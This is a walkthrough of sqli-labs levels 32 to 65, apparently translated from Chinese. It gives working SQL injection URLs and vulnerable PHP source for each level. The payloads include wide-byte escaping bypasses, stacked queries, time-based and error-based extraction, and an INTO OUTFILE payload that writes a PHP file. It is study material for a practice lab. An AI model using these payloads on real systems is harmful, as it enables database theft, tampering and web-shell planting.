When MySQL uses the GBK character set, it treats two bytes as one Chinese character; for example %aa%5c is one character (the leading byte must be greater than 128 in ASCII to fall into the Chinese range). The usual way of filtering ' is to turn ' into \' (the function or approach used will be introduced at each level where it appears). So here we look for a way to get rid of the \ that is added in front of ', and there are generally two ideas:

(1) Let %df swallow the \. The reason: urlencode(\') = %5c%27. If we put %df in front of %5c%27 to form %df%5c%27, then, because MySQL in GBK mode treats two bytes as one character, %df%5c becomes a single Chinese character and %27 is left over as a standalone quote, which achieves our goal.

(2)将 \’ 中的 \ 过滤掉,例如可以构造 %**%5c%5c%27 的情况,后面的%5c 会被前面的%5c 给注释掉。这也是 bypass 的一种方法

Manual injection

http://127.0.0.1:8081/sqli-labs/Less-32/?id=-1%df'union select 1,user(),3--+

Source analysis

function check_addslashes($string)
{
$string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string); //escape any backslash
$string = preg_replace('/\'/i', '\\\'', $string); //escape single quote with a backslash
$string = preg_replace('/\"/', "\\\"", $string); //escape double quote with a backslash


return $string;
}
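The wide-byte mechanism from the explanation above, modelled in Python as an added example that is not part of the original write-up or of sqli-labs. It models two pipelines: the byte-wise escaping of check_addslashes()/addslashes() followed by the server decoding the bytes as GBK (the Less-32 to Less-35 situation), and a charset-aware pipeline that decodes first and escapes characters, which is what a correctly configured mysqli_set_charset() plus mysqli_real_escape_string() achieves. The input byte string is constructed from the %df' prefix used on this level.

```python
def escape_bytewise(raw: bytes) -> bytes:
    """Byte-level model of addslashes(): put a backslash (0x5c) in front of
    every ' " \ byte, without any knowledge of the character set."""
    out = bytearray()
    for b in raw:
        if b in b"'\"\\":
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def escape_charwise(text: str) -> str:
    """Character-level escaping: same rule, but applied after decoding, so a
    backslash can never be absorbed into a preceding multi-byte lead byte."""
    return "".join("\\" + ch if ch in "'\"\\" else ch for ch in text)


def naive_pipeline(raw: bytes, charset: str) -> str:
    """Escape the raw bytes first, then let the server decode them as `charset`.
    This is the order that produces the wide-byte bypass under GBK."""
    return escape_bytewise(raw).decode(charset, errors="replace")


def aware_pipeline(raw: bytes, charset: str) -> str:
    """Decode under the connection charset first, then escape characters."""
    return escape_charwise(raw.decode(charset, errors="replace"))


def has_bare_quote(sql_fragment: str) -> bool:
    """True if a single quote that is not protected by a backslash is present,
    i.e. the quote would terminate the SQL string literal."""
    i = 0
    while i < len(sql_fragment):
        ch = sql_fragment[i]
        if ch == "\\":
            i += 2          # backslash protects whatever follows it
            continue
        if ch == "'":
            return True
        i += 1
    return False


# Constructed from the Less-32 payload prefix: the raw bytes of "%df'".
WIDE_BYTE_INPUT = b"\xdf'"

if __name__ == "__main__":
    for charset in ("gbk", "utf-8"):
        print(charset, "naive :", has_bare_quote(naive_pipeline(WIDE_BYTE_INPUT, charset)))
        print(charset, "aware :", has_bare_quote(aware_pipeline(WIDE_BYTE_INPUT, charset)))
```

Under GBK the naive order yields one CJK character followed by a bare quote (the backslash has been consumed as a trail byte); under UTF-8 the lone 0xdf is just an invalid byte and the quote stays escaped, which is why the same payload does nothing against a UTF-8 connection.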

Less-33 Bypass addslashes()

Manual injection

http://127.0.0.1:8081/sqli-labs/Less-33/?id=-1%df'union select 1,user(),3--+

Source analysis

function check_addslashes($string)
{
$string= addslashes($string);
return $string;
}

Less-34 Bypass Add SLASHES

Manual injection

34.png

Less-35 why care for addslashes()

Manual injection

http://127.0.0.1:8081/sqli-labs/Less-35/?id=-1 union select 1,user(),3;--+

Source analysis

function check_addslashes($string)
{
$string = addslashes($string);
return $string;
}

Less-36 Bypass MySQL Real Escape String

Manual injection

http://127.0.0.1:8081/sqli-labs/Less-36/?id=-1%df'union select 1,database(),3--+
http://127.0.0.1:8081/sqli-labs/Less-36/?id=-1%EF%BF%BD'union select 1,user(),3--+

Source analysis

function check_quotes($con1, $string)
{
$string=mysqli_real_escape_string($con1, $string);
return $string;
}

Less-37- MySQL_real_escape_string

Manual injection

Use Burp to send the request.

Source analysis

$uname = mysqli_real_escape_string($con1, $uname1);
$passwd= mysqli_real_escape_string($con1, $passwd1);

mysqli_query($con1, "SET NAMES gbk");
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";

Page-3 (Stacked Injections)

Less-38 stacked Query

Manual injection

Insert a row:

http://127.0.0.1:8081/sqli-labs/Less-38/?id=1';insert into users(id,username,password) values ('38','less38','hello')--+

38.png

Less-39 stacked Query Intiger type

Manual injection

http://127.0.0.1:8081/sqli-labs/Less-39/?id=1;insert into users(id,username,password) values ('39','less39','hello')--+

Less-40 stacked Query String type Blind

Manual injection

http://127.0.0.1:8081/sqli-labs/Less-40/?id=1'); insert into users(id,username, password) values ('40','less40','hello')--+

Less-41 stacked Query Intiger type blind

Manual injection

http://127.0.0.1:8081/sqli-labs/Less-41/?id=1;insert into users(id,username,password) values ('41','less41','hello')--+

Source analysis

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

Less-42 - Stacked Query error based

Manual injection

username:admin

Password:c';create table less42 like users--+

42.png

less43 POST -Error based -String -Stacked with tiwst (error-based POST stacked twisted string injection)

Manual injection

username:admin

Password:c');create table less43 like users--+

Less-44 - Stacked Query blind

Manual injection

username:admin

Password:c';create table less44 like users--+

less-45 Error-based injection closed with ') in the password field

Manual injection

username:admin

Password:c');create table less45 like users--+

less-46 ORDER BY-Error-Numeric

Manual injection

#error-based injection
http://127.0.0.1:8081/sqli-labs/Less-46/?sort=(select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2)))
#file import/export with into outfile also works on this parameter

Source analysis

$sql = "SELECT * FROM users ORDER BY $id";

Less-47 - ORDER BY Clause-Error-Single quote

Manual injection

47.png

http://127.0.0.1:8081/sqli-labs/Less-47/?sort=1'into outfile "文件地址"lines terminated by 0x3c3f70687020706870696e666f28293b3f3e2020--+

Less-48 - ORDER BY Clause Blind based

Manual injection

Boolean blind injection, time-based injection and file operations all work; apart from error-based injection being unavailable, this is the same as Less-46.

Less49 - ORDER BY Clause Blind based

Manual injection

Apart from error-based injection being unavailable, the same as Less-47.

Less50 - ORDER BY Clause Blind based

Manual injection

http://127.0.0.1:8081/sqli-labs/Less-50/?sort=1;create table less50 like users

50.png

Less-51 - ORDER BY Clause Blind based

Manual injection

http://127.0.0.1:8081/sqli-labs/Less-51/?sort=1';create table less51 like users--+

Less-52 - ORDER BY Clause Blind based

Manual injection

http://127.0.0.1:8081/sqli-labs/Less-52/?sort=1;create table less52 like users

Less-53 - ORDER BY Clause Blind based

Manual injection

http://127.0.0.1:8081/sqli-labs/Less-53/?sort=1';create table less53 like users--+

Page-4 (Challenges)

Less-54:Challenge-1

Manual injection

#get the table name cul94axau9
http://127.0.0.1:8081/sqli-labs/Less-54/index.php?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+
#get the column names id,sessid,secret_B27K,tryy
http://127.0.0.1:8081/sqli-labs/Less-54/index.php?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='cul94axau9'--+
#get the answer
http://127.0.0.1:8081/sqli-labs/Less-54/index.php?id=-1'union select 1,2,group_concat(secret_B27K) from challenges.cul94axau9--+

54.png

Less-55:Challenge-2

Manual injection

#get the table name k6cm9525rm
http://127.0.0.1:8081/sqli-labs/Less-55/index.php?id=-1)union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+
#get the column names id,sessid,secret_6TMN,tryy
http://127.0.0.1:8081/sqli-labs/Less-55/index.php?id=-1)union select 1,2,group_concat(column_name) from information_schema.columns where table_name='k6cm9525rm'--+
#get the answer
http://127.0.0.1:8081/sqli-labs/Less-55/index.php?id=-1)union select 1,2,group_concat(secret_6TMN) from challenges.k6cm9525rm--+

55.png

Less-56:Challenge-3

Manual injection

This level wraps the input in ('').

http://127.0.0.1:8081/sqli-labs/Less-56/?id=-1')union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

Source analysis

$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";

Less-57:Challenge-4

Manual injection

This level wraps the input in "".

http://127.0.0.1:8081/sqli-labs/Less-57/?id=-1"union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

Source analysis

$id= '"'.$id.'"';
// Querry DB to get the correct output
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";

Less-58:Challenge-5

Manual injection

Error-based injection:

http://127.0.0.1:8081/sqli-labs/Less-58/?id=-1'union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--+

Less-59:Challenge-6

Manual injection

Error-based injection:

http://127.0.0.1:8081/sqli-labs/Less-59/?id=-1 union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--+

Source analysis

$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";

Less-60:Challenge-7

Manual injection

Error-based injection:

http://127.0.0.1:8081/sqli-labs/Less-60/?id=-1")union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--+

Source analysis

$id = '("'.$id.'")';
// Querry DB to get the correct output
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";

Less-61:Challenge-8

Manual injection

Error-based injection:

http://127.0.0.1:8081/sqli-labs/Less-61/?id=-1'))union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--+

Source analysis

$sql="SELECT * FROM security.users WHERE id=(('$id')) LIMIT 0,1";

Less-62:Challenge-9

Manual injection

Time-based injection (a script can be used here):

http://127.0.0.1:8081/sqli-labs/Less-61/?id=1')and If(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=79,0,sleep(10))--+

Source analysis

$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";

Less-63:Challenge-10

Manual injection

Same as Less-62: use time-based injection.

Source analysis

$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";

Less-64:Challenge-11

Manual injection

Same as Less-62: use time-based injection.

Source analysis

$sql="SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1";

Less-65:Challenge-12

Manual injection

Same as Less-62: use time-based injection.

Source analysis

$id = '"'.$id.'"';
// Querry DB to get the correct output
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";

Summary of common techniques

General procedure

MySQL has a system database, information_schema, which stores metadata about every database on the server; in general a complete injection can be carried out by walking this database. The typical procedure is as follows.

Enumerate databases

select schema_name from information_schema.schemata
select group_concat(schema_name) from information_schema.schemata
select 1,group_concat(schema_name),3 from information_schema.schemata

Enumerate the tables of a database

select table_name from information_schema.tables where table_schema='xxxxx'
select group_concat(table_name) from information_schema.tables where table_schema='xxxxx'
select 1,group_concat(table_name),3 from information_schema.tables where table_schema='xxxxx'

Enumerate all columns of a table

Select column_name from information_schema.columns where table_name='xxxxx'
select group_concat(column_name) from information_schema.columns where table_name='xxxxx'
select 1,group_concat(column_name),3 from information_schema.columns where table_name='xxxxx'

Read the contents of a column

Select xxxx from xxxxxx 

Reference levels for the above: Less-1 to Less-4.